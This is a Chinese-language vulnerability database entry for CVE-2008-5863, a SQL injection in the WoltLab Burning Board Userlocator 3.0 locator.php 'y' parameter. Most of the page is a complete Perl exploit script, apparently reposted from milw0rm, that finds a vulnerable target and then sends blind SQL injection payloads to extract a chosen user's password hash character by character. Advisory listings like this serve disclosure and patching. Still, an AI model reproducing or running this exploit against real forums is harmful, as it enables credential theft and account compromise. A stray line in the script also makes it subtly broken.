V-Gn Userlocator脚本locator.php参数y SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117103 漏洞类型 SQL注入
发布时间 2008-12-21 更新时间 2009-02-12
CVE编号 CVE-2008-5863 CNNVD-ID CNNVD-200901-052
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7530
https://cxsecurity.com/issue/WLB-2009010130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-052
|漏洞详情
WoltLabBurningBoard是一款可自定义的论坛程序。WoltlabBurningBoard(wBB)Userlocator模块3.0版本中的locator.php存在SQL注入漏洞。远程攻击者可以借助get_user操作中的y参数,执行任意的SQL指令。
|漏洞EXP
#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;
p
print q {

:::::::::::::::::::::::::::::
:: Userlocator 3.0 Exploit ::
::  written by katharsis   ::
:::::::::::::::::::::::::::::

[~] www.katharsis.x2.to
[~] nebelfrost23@web.de

};

if (@ARGV < 2) {
 print "Usage: usrlocsploit.pl [url] [user id]\nExample: usrlocsploit.pl www.target.com 1\n";
 exit;
}

my $page = shift;
my $uid  = shift;

my $prefix;

my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print "[x] Vulnerability check...\n";

my $chreq = get("http://".$page."/locator.php?action=get_user&y='");

if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) { 

print "[x] Seems to be vulnerable!\n";

} else {

print "[o] Seems to be patched, sorry\n";
exit;

}

print "[^] Prefix check...\n";

if ($chreq =~ m/(..._)wlw/i) {

 print "[^] Success, using Prefix '$1'\n";
 $prefix = $1;

} else { 
 print "[o] Can't find prefix, using 'bb1_'\n";
 $prefix = "bb1";
}

print "[+] Getting hash...\n";
print "[+] Hash: ";

my $curnum = 1;

while($curnum < 32) {

my $false_result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*");

foreach(@charset) {

 my $ascode       = ord($_);
 my $result       = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*");

 if (length($result) != 0) {
  if (length($result) != length($false_result)) {
   print chr($ascode);
   $curnum++;
   }
  }
 }
}

print "\n[+] Done!\n";

# EOF

# milw0rm.com [2008-12-21]
|参考资料

来源:XF
名称:userlocator-wbb-locator-sql-injection(47887)
链接:http://xforce.iss.net/xforce/xfdb/47887
来源:BID
名称:32960
链接:http://www.securityfocus.com/bid/32960
来源:MILW0RM
名称:7530
链接:http://www.milw0rm.com/exploits/7530
来源:SREASON
名称:4874
链接:http://securityreason.com/securityalert/4874